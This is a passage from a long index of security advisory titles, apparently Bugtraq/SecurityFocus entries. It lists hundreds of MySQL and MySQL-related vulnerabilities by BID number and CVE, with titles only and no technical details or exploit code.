19458| [86463] Oracle MySQL CVE-2016-0658 Remote Security Vulnerability
19459| [86457] Oracle MySQL CVE-2016-0648 Remote Security Vulnerability
19460| [86454] Oracle MySQL CVE-2016-0652 Remote Security Vulnerability
19461| [86451] Oracle MySQL CVE-2016-0663 Remote Security Vulnerability
19462| [86445] Oracle MySQL CVE-2016-0642 Remote Security Vulnerability
19463| [86442] Oracle MySQL CVE-2016-0644 Remote Security Vulnerability
19464| [86439] Oracle MySQL CVE-2016-0653 Remote Security Vulnerability
19465| [86436] Oracle MySQL CVE-2016-0646 Remote Security Vulnerability
19466| [86433] Oracle MySQL CVE-2016-0657 Remote Security Vulnerability
19467| [86431] Oracle MySQL CVE-2016-0656 Remote Security Vulnerability
19468| [86427] Oracle MySQL CVE-2016-0640 Remote Security Vulnerability
19469| [86424] Oracle MySQL CVE-2016-0655 Remote Security Vulnerability
19470| [86418] Oracle MySQL CVE-2016-0639 Remote Security Vulnerability
19471| [85985] MariaDB and MySQL CVE-2015-5969 Local Information Disclosure Vulnerability
19472| [85262] MySQL CVE-2007-5970 Remote Security Vulnerability
19473| [85246] Mysql Community Server CVE-2007-6313 Remote Security Vulnerability
19474| [85215] Mysql Banner Exchange CVE-2007-6512 Denial-Of-Service Vulnerability
19475| [83639] MySQLDumper CVE-2006-5264 Cross-Site Scripting Vulnerability
19476| [83232] MySQL Connector/Net CVE-2006-4227 Remote Security Vulnerability
19477| [83194] MySQL CVE-2004-0628 Denial Of Service Vulnerability
19478| [82913] MySQL CVE-2001-1453 Remote Security Vulnerability
19479| [82911] MySQL CVE-2001-1454 Remote Security Vulnerability
19480| [81810] MariaDB/MySQL/Percona Server CVE-2016-2047 SSL Certificate Validation Security Bypass Vulnerability
19481| [81258] Oracle MySQL CVE-2016-0609 Remote Security Vulnerability
19482| [81253] Oracle MySQL CVE-2016-0605 Remote Security Vulnerability
19483| [81245] Oracle MySQL CVE-2015-7744 Remote Security Vulnerability
19484| [81238] Oracle MySQL CVE-2016-0607 Remote Security Vulnerability
19485| [81226] Oracle MySQL CVE-2016-0608 Remote Security Vulnerability
19486| [81211] Oracle MySQL CVE-2016-0601 Remote Security Vulnerability
19487| [81203] Oracle MySQL CVE-2016-0599 Remote Security Vulnerability
19488| [81198] Oracle MySQL CVE-2016-0610 Remote Security Vulnerability
19489| [81188] Oracle MySQL CVE-2016-0600 Remote Security Vulnerability
19490| [81182] Oracle MySQL CVE-2016-0598 Remote Security Vulnerability
19491| [81176] Oracle MySQL CVE-2016-0616 Remote Security Vulnerability
19492| [81164] Oracle MySQL CVE-2016-0611 Remote Security Vulnerability
19493| [81151] Oracle MySQL CVE-2016-0597 Remote Security Vulnerability
19494| [81136] Oracle MySQL CVE-2016-0502 Remote Security Vulnerability
19495| [81130] Oracle MySQL CVE-2016-0596 Remote Security Vulnerability
19496| [81126] Oracle MySQL CVE-2016-0503 Remote Security Vulnerability
19497| [81121] Oracle MySQL CVE-2016-0595 Remote Security Vulnerability
19498| [81108] Oracle MySQL CVE-2016-0594 Remote Security Vulnerability
19499| [81088] Oracle MySQL CVE-2016-0505 Remote Security Vulnerability
19500| [81077] Oracle MySQL CVE-2016-0504 Remote Security Vulnerability
19501| [81066] Oracle MySQL CVE-2016-0546 Local Security Vulnerability
19502| [79408] Mysql-Ocaml CVE-2009-2942 Remote Security Vulnerability
19503| [79044] kiddog_mysqldumper CVE-2010-0336 Information Disclosure Vulnerability
19504| [78373] MySQL CVE-2011-5049 Denial-Of-Service Vulnerability
19505| [77237] Oracle MySQL Server CVE-2015-4826 Remote Security Vulnerability
19506| [77234] Oracle MySQL Server CVE-2015-4910 Remote Security Vulnerability
19507| [77232] Oracle MySQL Server CVE-2015-4766 Local Security Vulnerability
19508| [77231] Oracle MySQL Server CVE-2015-4890 Remote Security Vulnerability
19509| [77228] Oracle MySQL Server CVE-2015-4830 Remote Security Vulnerability
19510| [77222] Oracle MySQL Server CVE-2015-4815 Remote Security Vulnerability
19511| [77219] Oracle MySQL Server CVE-2015-4904 Remote Security Vulnerability
19512| [77216] Oracle MySQL Server CVE-2015-4800 Remote Security Vulnerability
19513| [77213] Oracle MySQL Server CVE-2015-4791 Remote Security Vulnerability
19514| [77208] Oracle MySQL Server CVE-2015-4870 Remote Security Vulnerability
19515| [77205] Oracle MySQL Server CVE-2015-4807 Remote Security Vulnerability
19516| [77199] Oracle MySQL Server CVE-2015-4730 Remote Security Vulnerability
19517| [77196] Oracle MySQL Server CVE-2015-4819 Local Security Vulnerability
19518| [77190] Oracle MySQL Server CVE-2015-4836 Remote Security Vulnerability
19519| [77187] Oracle MySQL Server CVE-2015-4864 Remote Security Vulnerability
19520| [77171] Oracle MySQL Server CVE-2015-4792 Remote Security Vulnerability
19521| [77170] Oracle MySQL Server CVE-2015-4833 Remote Security Vulnerability
19522| [77165] Oracle MySQL Server CVE-2015-4802 Remote Security Vulnerability
19523| [77153] Oracle MySQL Server CVE-2015-4913 Remote Security Vulnerability
19524| [77147] Oracle MySQL Server CVE-2015-4862 Remote Security Vulnerability
19525| [77145] Oracle MySQL Server CVE-2015-4858 Remote Security Vulnerability
19526| [77143] Oracle MySQL Server CVE-2015-4905 Remote Security Vulnerability
19527| [77140] Oracle MySQL Server CVE-2015-4879 Remote Security Vulnerability
19528| [77137] Oracle MySQL Server CVE-2015-4861 Remote Security Vulnerability
19529| [77136] Oracle MySQL Server CVE-2015-4895 Remote Security Vulnerability
19530| [77134] Oracle MySQL Server CVE-2015-4816 Remote Security Vulnerability
19531| [77132] Oracle MySQL Server CVE-2015-4866 Remote Security Vulnerability
19532| [77015] Oracle MySQL Multiple Buffer Overflow Vulnerabilities
19533| [75849] Oracle MySQL Server CVE-2015-4752 Remote Security Vulnerability
19534| [75844] Oracle MySQL Server CVE-2015-4767 Remote Security Vulnerability
19535| [75837] Oracle MySQL Server CVE-2015-2620 Remote Security Vulnerability
19536| [75835] Oracle MySQL Server CVE-2015-4771 Remote Security Vulnerability
19537| [75830] Oracle MySQL Server CVE-2015-2643 Remote Security Vulnerability
19538| [75822] Oracle MySQL Server CVE-2015-2648 Remote Security Vulnerability
19539| [75815] Oracle MySQL Server CVE-2015-2641 Remote Security Vulnerability
19540| [75813] Oracle MySQL Server CVE-2015-2661 Local Security Server Vulnerability
19541| [75802] Oracle MySQL Server CVE-2015-4737 Remote Security Vulnerability
19542| [75785] Oracle MySQL Server CVE-2015-4756 Remote Security Vulnerability
19543| [75781] Oracle MySQL Server CVE-2015-4772 Remote Security Vulnerability
19544| [75774] Oracle MySQL Server CVE-2015-2617 Remote Security Vulnerability
19545| [75770] Oracle MySQL Server CVE-2015-4761 Remote Security Vulnerability
19546| [75762] Oracle MySQL Server CVE-2015-2611 Remote Security Vulnerability
19547| [75760] Oracle MySQL Server CVE-2015-2639 Remote Security Vulnerability
19548| [75759] Oracle MySQL Server CVE-2015-4757 Remote Security Vulnerability
19549| [75753] Oracle MySQL Server CVE-2015-4769 Remote Security Vulnerability
19550| [75751] Oracle MySQL Server CVE-2015-2582 Remote Security Vulnerability
19551| [75397] MySql Lite Administrator Multiple Cross Site Scripting Vulnerabilities
19552| [75394] WordPress wp-instance-rename Plugin 'mysqldump_download.php' Arbitrary File Download Vulnerability
19553| [74695] Tiny MySQL 'tinymy.php' Cross Site Scripting Vulnerability
19554| [74398] Oracle MySQL CVE-2015-3152 SSL Certificate Validation Security Bypass Vulnerability
19555| [74137] Oracle MySQL Utilities CVE-2015-2576 Local Security Vulnerability
19556| [74133] Oracle MySQL Server CVE-2015-0498 Remote Security Vulnerability
19557| [74130] Oracle MySQL Server CVE-2015-0511 Remote Security Vulnerability
19558| [74126] Oracle MySQL Server CVE-2015-2566 Remote Security Vulnerability
19559| [74123] Oracle MySQL Server CVE-2015-2567 Remote Security Vulnerability
19560| [74121] Oracle MySQL Server CVE-2015-0507 Remote Security Vulnerability
19561| [74120] Oracle MySQL Server CVE-2015-0506 Remote Security Vulnerability
19562| [74115] Oracle MySQL Server CVE-2015-0499 Remote Security Vulnerability
19563| [74112] Oracle MySQL Server CVE-2015-0505 Remote Security Vulnerability
19564| [74110] Oracle MySQL Server CVE-2015-0405 Remote Security Vulnerability
19565| [74103] Oracle MySQL Server CVE-2015-0441 Remote Security Vulnerability
19566| [74102] Oracle MySQL Server CVE-2015-0503 Remote Security Vulnerability
19567| [74098] Oracle MySQL Server CVE-2015-0438 Remote Security Vulnerability
19568| [74095] Oracle MySQL Server CVE-2015-2571 Remote Security Vulnerability
19569| [74091] Oracle MySQL Server CVE-2015-0423 Remote Security Vulnerability
19570| [74089] Oracle MySQL Server CVE-2015-0433 Remote Security Vulnerability
19571| [74086] Oracle MySQL Server CVE-2015-0508 Remote Security Vulnerability
19572| [74085] Oracle MySQL Server CVE-2015-0439 Remote Security Vulnerability
19573| [74081] Oracle MySQL Server CVE-2015-0500 Remote Security Vulnerability
19574| [74078] Oracle MySQL Server CVE-2015-2573 Remote Security Vulnerability
19575| [74075] Oracle MySQL Connectors CVE-2015-2575 Remote Security Vulnerability
19576| [74073] Oracle MySQL Server CVE-2015-2568 Remote Security Vulnerability
19577| [74070] Oracle MySQL Server CVE-2015-0501 Remote Security Vulnerability
19578| [72728] RubyGems xaviershay-dm-rails 'storage.rb' MySQL Credential Information Disclosure Vulnerability
19579| [72229] Oracle MySQL Server CVE-2015-0385 Remote Security Vulnerability
19580| [72227] Oracle MySQL Server CVE-2015-0374 Remote Security Vulnerability
19581| [72223] Oracle MySQL Server CVE-2015-0409 Remote Security Vulnerability
19582| [72217] Oracle MySQL Server CVE-2015-0432 Remote Security Vulnerability
19583| [72214] Oracle MySQL Server CVE-2015-0381 Remote Security Vulnerability
19584| [72210] Oracle MySQL Server CVE-2014-6568 Remote Security Vulnerability
19585| [72205] Oracle MySQL Server CVE-2015-0391 Remote Security Vulnerability
19586| [72200] Oracle MySQL Server CVE-2015-0382 Remote Security Vulnerability
19587| [72191] Oracle MySQL Server CVE-2015-0411 Remote Security Vulnerability
19588| [70550] Oracle MySQL Server CVE-2014-6507 Remote Security Vulnerability
19589| [70540] RETIRED: Oracle MySQL Server CVE-2012-5615 Remote Security Vulnerability
19590| [70532] Oracle MySQL Server CVE-2014-6463 Remote Security Vulnerability
19591| [70530] Oracle MySQL Server CVE-2014-6555 Remote Security Vulnerability
19592| [70525] Oracle MySQL Server CVE-2014-6489 Remote Security Vulnerability
19593| [70517] Oracle MySQL Server CVE-2014-4287 Remote Security Vulnerability
19594| [70516] Oracle MySQL Server CVE-2014-6505 Remote Security Vulnerability
19595| [70511] Oracle MySQL Server CVE-2014-6564 Remote Security Vulnerability
19596| [70510] Oracle MySQL Server CVE-2014-6520 Remote Security Vulnerability
19597| [70497] Oracle MySQL Server CVE-2014-6494 Remote Security Vulnerability
19598| [70496] Oracle MySQL Server CVE-2014-6495 Remote Security Vulnerability
19599| [70489] Oracle MySQL Server CVE-2014-6478 Remote Security Vulnerability
19600| [70487] Oracle MySQL Server CVE-2014-6559 Remote Security Vulnerability
19601| [70486] Oracle MySQL Server CVE-2014-6530 Remote Security Vulnerability
19602| [70478] Oracle MySQL Server CVE-2014-6500 Remote Security Vulnerability
19603| [70469] Oracle MySQL Server CVE-2014-6496 Remote Security Vulnerability
19604| [70462] Oracle MySQL Server CVE-2014-6551 Local Security Vulnerability
19605| [70455] Oracle MySQL Server CVE-2014-6484 Remote Security Vulnerability
19606| [70451] Oracle MySQL Server CVE-2014-6464 Remote Security Vulnerability
19607| [70448] Oracle MySQL Server CVE-2014-6474 Remote Security Vulnerability
19608| [70446] Oracle MySQL Server CVE-2014-6469 Remote Security Vulnerability
19609| [70444] Oracle MySQL Server CVE-2014-6491 Remote Security Vulnerability
19610| [69743] Oracle MySQL Client yaSSL Certificate Decode Buffer Overflow Vulnerability
19611| [69732] MySQL MyISAM Insecure Temporary File Creation Vulnerability
19612| [68736] RubyGems lean-ruport MySQL Credential Local Information Disclosure Vulnerability
19613| [68607] Oracle MySQL Server CVE-2014-4214 Remote Security Vulnerability
19614| [68602] Oracle MySQL Server CVE-2014-4240 Local Security Vulnerability
19615| [68598] Oracle MySQL Server CVE-2014-4233 Remote Security Vulnerability
19616| [68593] Oracle MySQL Server CVE-2014-4207 Remote Security Vulnerability
19617| [68587] Oracle MySQL Server CVE-2014-4238 Remote Security Vulnerability
19618| [68579] Oracle MySQL Server CVE-2014-2494 Remote Security Vulnerability
19619| [68573] Oracle MySQL Server CVE-2014-4260 Remote Security Vulnerability
19620| [68564] Oracle MySQL Server CVE-2014-4258 Remote Security Vulnerability
19621| [66896] Oracle MySQL Server CVE-2014-2436 Remote Security Vulnerability
19622| [66890] Oracle MySQL Server CVE-2014-2431 Remote Security Vulnerability
19623| [66885] Oracle MySQL Server CVE-2014-2444 Remote Security Vulnerability
19624| [66880] Oracle MySQL Server CVE-2014-2419 Remote Security Vulnerability
19625| [66872] Oracle MySQL Server CVE-2014-2434 Remote Security Vulnerability
19626| [66863] Oracle MySQL Server CVE-2014-2450 Remote Security Vulnerability
19627| [66858] Oracle MySQL Server CVE-2014-2430 Remote Security Vulnerability
19628| [66853] Oracle MySQL Server CVE-2014-2435 Remote Security Vulnerability
19629| [66850] Oracle MySQL Client CVE-2014-2440 Remote Security Vulnerability
19630| [66846] Oracle MySQL Server CVE-2014-2438 Remote Security Vulnerability
19631| [66835] Oracle MySQL Server CVE-2014-0384 Remote Security Vulnerability
19632| [66828] Oracle MySQL Server CVE-2014-2451 Remote Security Vulnerability
19633| [66823] Oracle MySQL Server CVE-2014-2442 Remote Security Vulnerability
19634| [66153] lighttpd 'mod_mysql_vhost.c' SQL Injection Vulnerability
19635| [65890] InterWorx MySQL Password Information Disclosure Vulnerability
19636| [65621] Percona Toolkit for MySQL Automatic Version Check Information Disclosure Vulnerability
19637| [65298] Oracle MySQL Client 'main()' Function Buffer Overflow Vulnerability
19638| [64908] Oracle MySQL Server CVE-2014-0402 Remote Security Vulnerability
19639| [64904] Oracle MySQL Server CVE-2014-0386 Remote Security Vulnerability
19640| [64898] Oracle MySQL Server CVE-2014-0401 Remote Security Vulnerability
19641| [64897] Oracle MySQL Server CVE-2014-0431 Remote Security Vulnerability
19642| [64896] Oracle MySQL Server CVE-2013-5908 Remote Security Vulnerability
19643| [64895] Oracle MySQL Server CVE-2014-0433 Remote Security Vulnerability
19644| [64893] Oracle MySQL Server CVE-2014-0430 Remote Security Vulnerability
19645| [64891] Oracle MySQL Server CVE-2013-5891 Remote Security Vulnerability
19646| [64888] Oracle MySQL Server CVE-2014-0420 Remote Security Vulnerability
19647| [64885] Oracle MySQL Server CVE-2013-5881 Remote Security Vulnerability
19648| [64880] Oracle MySQL Server CVE-2014-0412 Remote Security Vulnerability
19649| [64877] Oracle MySQL Server CVE-2014-0393 Remote Security Vulnerability
19650| [64873] Oracle MySQL Server CVE-2013-5894 Remote Security Vulnerability
19651| [64868] Oracle MySQL Server CVE-2014-0427 Remote Security Vulnerability
19652| [64864] Oracle MySQL Server CVE-2013-5860 Remote Security Vulnerability
19653| [64854] Oracle MySQL Server CVE-2013-5882 Remote Security Vulnerability
19654| [64849] Oracle MySQL Server CVE-2014-0437 Remote Security Vulnerability
19655| [64731] CSP MySQL User Manager 'login.php' Script SQL Injection Vulnerability
19656| [64630] Zen Cart 'mysql_zencart.sql' Information Disclosure Vulnerability
19657| [63125] Oracle MySQL Server CVE-2012-2750 Remote Security Vulnerability
19658| [63119] Oracle MySQL Server CVE-2013-5770 Remote Security Vulnerability
19659| [63116] Oracle MySQL Server CVE-2013-5793 Remote Security Vulnerability
19660| [63113] Oracle MySQL Server CVE-2013-5767 Remote Security Vulnerability
19661| [63109] Oracle MySQL Server CVE-2013-3839 Remote Security Vulnerability
19662| [63107] Oracle MySQL Server CVE-2013-5786 Remote Security Vulnerability
19663| [63105] Oracle MySQL Server CVE-2013-5807 Remote Security Vulnerability
19664| [62358] Oracle MySQL CVE-2005-2572 Remote Code Execution Vulnerability
19665| [61274] Oracle MySQL Server CVE-2013-3798 Remote Security Vulnerability
19666| [61272] Oracle MySQL Server CVE-2013-3809 Remote Security Vulnerability
19667| [61269] Oracle MySQL Server CVE-2013-3801 Remote Security Vulnerability
19668| [61264] Oracle MySQL Server CVE-2013-3793 Remote Security Vulnerability
19669| [61260] Oracle MySQL Server CVE-2013-3804 Remote Security Vulnerability
19670| [61256] Oracle MySQL Server CVE-2013-3805 Remote Security Vulnerability
19671| [61252] Oracle MySQL Server CVE-2013-3811 Remote Security Vulnerability
19672| [61249] Oracle MySQL Server CVE-2013-3812 Remote Security Vulnerability
19673| [61244] Oracle MySQL Server CVE-2013-3802 Remote Security Vulnerability
19674| [61241] Oracle MySQL Server CVE-2013-3795 Remote Security Vulnerability
19675| [61238] Oracle MySQL Server CVE-2013-3807 Remote Security Vulnerability
19676| [61235] Oracle MySQL Server CVE-2013-3806 Remote Security Vulnerability
19677| [61233] Oracle MySQL Server CVE-2013-3796 Remote Security Vulnerability
19678| [61227] Oracle MySQL Server CVE-2013-3808 Remote Security Vulnerability
19679| [61222] Oracle MySQL Server CVE-2013-3794 Remote Security Vulnerability
19680| [61214] Oracle MySQL Server CVE-2013-3810 Remote Security Vulnerability
19681| [61210] Oracle MySQL Server CVE-2013-3783 Remote Security Vulnerability
19682| [60424] Debian mysql-server CVE-2013-2162 Insecure File Creation Vulnerability
19683| [60001] Wireshark MySQL Dissector Denial of Service Vulnerability
19684| [59242] Oracle MySQL CVE-2013-2391 Local MySQL Server Vulnerability
19685| [59239] Oracle MySQL CVE-2013-1502 Local MySQL Server Vulnerability
19686| [59237] Oracle MySQL CVE-2013-1506 Remote MySQL Server Vulnerability
19687| [59232] Oracle MySQL CVE-2013-1567 Remote MySQL Server Vulnerability
19688| [59229] Oracle MySQL Server CVE-2013-1544 Remote Security Vulnerability
19689| [59227] Oracle MySQL CVE-2013-2376 Remote MySQL Server Vulnerability
19690| [59225] Oracle MySQL CVE-2013-1523 Remote MySQL Server Vulnerability
19691| [59224] Oracle MySQL Server CVE-2013-2392 Remote Security Vulnerability
19692| [59223] Oracle MySQL Server CVE-2013-1548 Remote Security Vulnerability
19693| [59222] RETIRED: Oracle MySQL CVE-2012-5614 Remote MySQL Server Vulnerability
19694| [59218] Oracle MySQL Server CVE-2013-1512 Remote Security Vulnerability
19695| [59217] Oracle MySQL CVE-2013-1526 Remote MySQL Server Vulnerability
19696| [59216] Oracle MySQL CVE-2013-1570 Remote MySQL Server Vulnerability
19697| [59215] Oracle MySQL Server CVE-2013-2381 Remote Security Vulnerability
19698| [59211] Oracle MySQL Server CVE-2013-1532 Remote Security Vulnerability
19699| [59210] Oracle MySQL CVE-2013-1555 Remote MySQL Server Vulnerability
19700| [59209] Oracle MySQL CVE-2013-2375 Remote MySQL Server Vulnerability
19701| [59207] Oracle MySQL Server CVE-2013-2389 Remote Security Vulnerability
19702| [59205] Oracle MySQL Server CVE-2013-1566 Remote Security Vulnerability
19703| [59202] Oracle MySQL CVE-2013-1531 Remote MySQL Server Vulnerability
19704| [59201] Oracle MySQL Server CVE-2013-1511 Remote Security Vulnerability
19705| [59196] Oracle MySQL CVE-2013-1552 Remote MySQL Server Vulnerability
19706| [59188] Oracle MySQL CVE-2013-2378 Remote MySQL Server Vulnerability
19707| [59180] Oracle MySQL CVE-2013-1521 Remote MySQL Server Vulnerability
19708| [59173] Oracle MySQL CVE-2013-2395 Remote MySQL Server Vulnerability
19709| [58511] MySQL and MariaDB Geometry Query Denial Of Service Vulnerability
19710| [57418] Oracle MySQL Server CVE-2013-0386 Remote Security Vulnerability
19711| [57417] Oracle MySQL Server CVE-2013-0389 Remote Security Vulnerability
19712| [57416] Oracle MySQL Server CVE-2013-0384 Remote Security Vulnerability
19713| [57415] Oracle MySQL Server CVE-2013-0371 Remote Security Vulnerability
19714| [57414] Oracle MySQL Server CVE-2012-0574 Remote Security Vulnerability
19715| [57412] Oracle MySQL Server CVE-2013-0385 Local Security Vulnerability
19716| [57411] Oracle MySQL Server CVE-2012-5060 Remote Security Vulnerability
19717| [57410] Oracle MySQL Server CVE-2012-1705 Remote Security Vulnerability
19718| [57408] Oracle MySQL Server CVE-2013-0367 Remote Security Vulnerability
19719| [57405] Oracle MySQL Server CVE-2013-0383 Remote Security Vulnerability
19720| [57400] Oracle MySQL Server CVE-2012-5096 Remote Security Vulnerability
19721| [57397] Oracle MySQL Server CVE-2013-0368 Remote Security Vulnerability
19722| [57391] Oracle MySQL Server CVE-2013-0375 Remote Security Vulnerability
19723| [57388] Oracle MySQL Server CVE-2012-1702 Remote Security Vulnerability
19724| [57385] Oracle MySQL Server CVE-2012-0572 Remote Security Vulnerability
19725| [57334] Oracle MySQL Server CVE-2012-0578 Remote Security Vulnerability
19726| [56837] Oracle MySQL and MariaDB CVE-2012-5627 Insecure Salt Generation Security Bypass Weakness
19727| [56791] Oracle MySQL Remote Code Execution Vulnerability
19728| [56776] Oracle MySQL CVE-2012-5614 Denial of Service Vulnerability
19729| [56772] Oracle MySQL Remote Code Execution Vulnerability
19730| [56771] Oracle MySQL Server Privilege Escalation Vulnerability
19731| [56769] Oracle MySQL and MariaDB 'acl_get()' Buffer Overflow Vulnerability
19732| [56768] Oracle MySQL Server Heap Overflow Vulnerability
19733| [56766] Oracle MySQL Server Username Enumeration Weakness
19734| [56041] Oracle MySQL Server CVE-2012-3173 Remote MySQL Security Vulnerability
19735| [56036] Oracle MySQL Server CVE-2012-3163 Remote MySQL Security Vulnerability
19736| [56028] Oracle MySQL Server CVE-2012-3166 Remote Security Vulnerability
19737| [56027] Oracle MySQL Server CVE-2012-3160 Local Security Vulnerability
19738| [56022] Oracle MySQL Server CVE-2012-3147 Remote Security Vulnerability
19739| [56021] Oracle MySQL Server CVE-2012-3197 Remote Security Vulnerability
19740| [56018] Oracle MySQL Server CVE-2012-3167 Remote Security Vulnerability
19741| [56017] Oracle MySQL Server CVE-2012-3158 Remote Security Vulnerability
19742| [56013] Oracle MySQL Server CVE-2012-3156 Remote Security Vulnerability
19743| [56008] Oracle MySQL Server CVE-2012-3144 Remote Security Vulnerability
19744| [56006] Oracle MySQL Server CVE-2012-3149 Remote Security Vulnerability
19745| [56005] Oracle MySQL Server CVE-2012-3177 Remote Security Vulnerability
19746| [56003] Oracle MySQL Server CVE-2012-3180 Remote Security Vulnerability
19747| [55990] Oracle MySQL Server CVE-2012-3150 Remote Security Vulnerability
19748| [55715] MySQL MyISAM Table Symbolic Link CVE-2012-4452 Local Privilege Escalation Vulnerability
19749| [55120] Oracle MySQL CVE-2012-2749 Denial Of Service Vulnerability
19750| [54551] Oracle MySQL Server CVE-2012-0540 Remote Security Vulnerability
19751| [54549] Oracle MySQL Server CVE-2012-1735 Remote Security Vulnerability
19752| [54547] Oracle MySQL Server CVE-2012-1689 Remote Security Vulnerability
19753| [54540] Oracle MySQL Server CVE-2012-1734 Remote Security Vulnerability
19754| [54526] Oracle MySQL Server CVE-2012-1757 Remote Security Vulnerability
19755| [54524] Oracle MySQL Server CVE-2012-1756 Remote Security Vulnerability
19756| [53922] RETIRED: MySQL and MariaDB 'sql/password.c' Authentication Bypass Vulnerability
19757| [53911] Oracle MySQL CVE-2012-2122 User Login Security Bypass Vulnerability
19758| [53310] MySQLDumper 'menu.php' Remote PHP Code Execution Vulnerability
19759| [53306] MySQLDumper Multiple Security Vulnerabilities
19760| [53074] Oracle MySQL CVE-2012-1690 Remote MySQL Server Vulnerability
19761| [53071] Oracle MySQL CVE-2012-1696 Remote MySQL Server Vulnerability
19762| [53067] Oracle MySQL CVE-2012-1688 Remote MySQL Server Vulnerability
19763| [53064] Oracle MySQL CVE-2012-1697 Remote MySQL Server Vulnerability
19764| [53061] Oracle MySQL CVE-2012-0583 Remote MySQL Server Vulnerability
19765| [53058] Oracle MySQL CVE-2012-1703 Remote MySQL Server Vulnerability
19766| [52931] Oracle MySQL Server Multiple Unspecified Security Vulnerabilities
19767| [52154] RETIRED: MySQL 5.5.20 Unspecified Remote Code Execution Vulnerability
19768| [51925] MySQL Unspecified Remote Code Execution Vulnerability
19769| [51526] Oracle MySQL CVE-2012-0075 Remote MySQL Server Vulnerability
19770| [51525] Oracle MySQL CVE-2012-0493 Remote Vulnerability
19771| [51524] Oracle MySQL Server CVE-2012-0490 Remote Security Vulnerability
19772| [51523] Oracle MySQL Server CVE-2012-0494 Local Security Vulnerability
19773| [51522] Oracle MySQL Server CVE-2012-0495 Remote Security Vulnerability
19774| [51521] Oracle MySQL Server CVE-2012-0117 Remote MySQL Server Vulnerability
19775| [51520] Oracle MySQL Server CVE-2012-0114 Local Security Vulnerability
19776| [51519] Oracle MySQL Server CVE-2012-0112 Remote MySQL Server Vulnerability
19777| [51518] Oracle MySQL Server CVE-2012-0491 Remote Security Vulnerability
19778| [51517] Oracle MySQL CVE-2012-0120 Remote Vulnerability
19779| [51516] Oracle MySQL Server CVE-2012-0492 Remote MySQL Server Vulnerability
19780| [51515] Oracle MySQL Server CVE-2012-0484 Remote Security Vulnerability
19781| [51514] Oracle MySQL Server CVE-2012-0486 Remote Security Vulnerability
19782| [51513] Oracle MySQL Server CVE-2012-0485 Remote Security Vulnerability
19783| [51512] Oracle MySQL CVE-2012-0119 Remote Vulnerability
19784| [51511] Oracle MySQL CVE-2012-0118 Remote MySQL Server Vulnerability
19785| [51510] Oracle MySQL Server CVE-2012-0489 Remote MySQL Server Vulnerability
19786| [51509] Oracle MySQL Server CVE-2012-0087 Remote Security Vulnerability
19787| [51508] Oracle MySQL CVE-2012-0116 Remote MySQL Server Vulnerability
19788| [51507] Oracle MySQL Server CVE-2012-0496 Remote Security Vulnerability
19789| [51506] Oracle MySQL Server CVE-2012-0488 Remote MySQL Server Vulnerability
19790| [51505] Oracle MySQL Server CVE-2012-0101 Remote Security Vulnerability
19791| [51504] Oracle MySQL CVE-2012-0115 Remote Vulnerability
19792| [51503] Oracle MySQL Server CVE-2012-0487 Remote MySQL Server Vulnerability
19793| [51502] Oracle MySQL Server CVE-2012-0102 Remote Security Vulnerability
19794| [51493] Oracle MySQL CVE-2011-2262 Remote MySQL Server Vulnerability
19795| [51488] Oracle MySQL CVE-2012-0113 Remote MySQL Server Vulnerability
19796| [50139] DBD::mysqlPP Unspecified SQL Injection Vulnerability
19797| [48466] MySQLDriverCS SQL Injection Vulnerability
19798| [47919] Zend Framework 'PDO_MySql' Security Bypass Vulnerability
19799| [47871] Oracle MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities
19800| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
19801| [46655] pywebdav MySQL Authentication Module SQL Injection Vulnerability
19802| [46456] MySQL Eventum 'full_name' Field HTML Injection Vulnerability
19803| [46380] MySQL Eventum Multiple HTML Injection Vulnerabilities
19804| [46056] PHP MySQLi Extension 'set_magic_quotes_runtime' Function Security-Bypass Weakness
19805| [43884] phpFK - PHP Forum Script ohne MySQL 'page_bottom.php' Local File Include Vulnerability
19806| [43677] Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability
19807| [43676] Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities
19808| [42646] Oracle MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability
19809| [42643] Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability
19810| [42638] Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability
19811| [42633] Oracle MySQL 'HANDLER' interface Denial Of Service Vulnerability
19812| [42625] Oracle MySQL 'LOAD DATA INFILE' Denial Of Service Vulnerability
19813| [42599] Oracle MySQL 'EXPLAIN' Denial Of Service Vulnerability
19814| [42598] Oracle MySQL 'TEMPORARY InnoDB' Tables Denial Of Service Vulnerability
19815| [42596] Oracle MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability
19816| [42586] RETIRED: Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities
19817| [42417] Zmanda Recovery Manager for MySQL Multiple Local Privilege Escalation Vulnerabilities
19818| [41440] phpFK - PHP Forum Script ohne MySQL 'upload.php' Arbitrary File Upload Vulnerability
19819| [41198] Oracle MySQL 'ALTER DATABASE' Remote Denial Of Service Vulnerability
19820| [40537] MySQL Enterprise Monitor Multiple Unspecified Cross Site Request Forgery Vulnerabilities
19821| [40506] RETIRED: phpGraphy 'mysql_cleanup.php' Remote File Include Vulnerability
19822| [40461] PHP Mysqlnd Extension Information Disclosure and Multiple Buffer Overflow Vulnerabilities
19823| [40257] Oracle MySQL DROP TABLE MyISAM Symbolic Link Local Security Bypass Vulnerability
19824| [40109] Oracle MySQL 'COM_FIELD_LIST' Command Packet Security Bypass Vulnerability
19825| [40106] Oracle MySQL 'COM_FIELD_LIST' Command Buffer Overflow Vulnerability
19826| [40100] Oracle MySQL Malformed Packet Handling Remote Denial of Service Vulnerability
19827| [40045] Advanced Poll 'mysql_host' Parameter Cross Site Scripting Vulnerability
19828| [39918] FlexAppsStore Flex MySQL Connector Unauthorized Access Vulnerability
19829| [39543] MySQL UNINSTALL PLUGIN Security Bypass Vulnerability
19830| [38642] Timeclock Software 'mysqldump' Local Information Disclosure Vulnerability
19831| [38043] MySQL 'sql/sql_table.cc' CREATE TABLE Security Bypass Vulnerability
19832| [37943] MySQL with yaSSL SSL Certificate Handling Remote Stack Buffer Overflow Vulnerability
19833| [37770] TYPO3 kiddog_mysqldumper Unspecified Information Disclosure Vulnerability
19834| [37640] MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability
19835| [37297] MySQL Multiple Remote Denial Of Service Vulnerabilities
19836| [37076] MySQL OpenSSL Server Certificate yaSSL Security Bypass Vulnerability
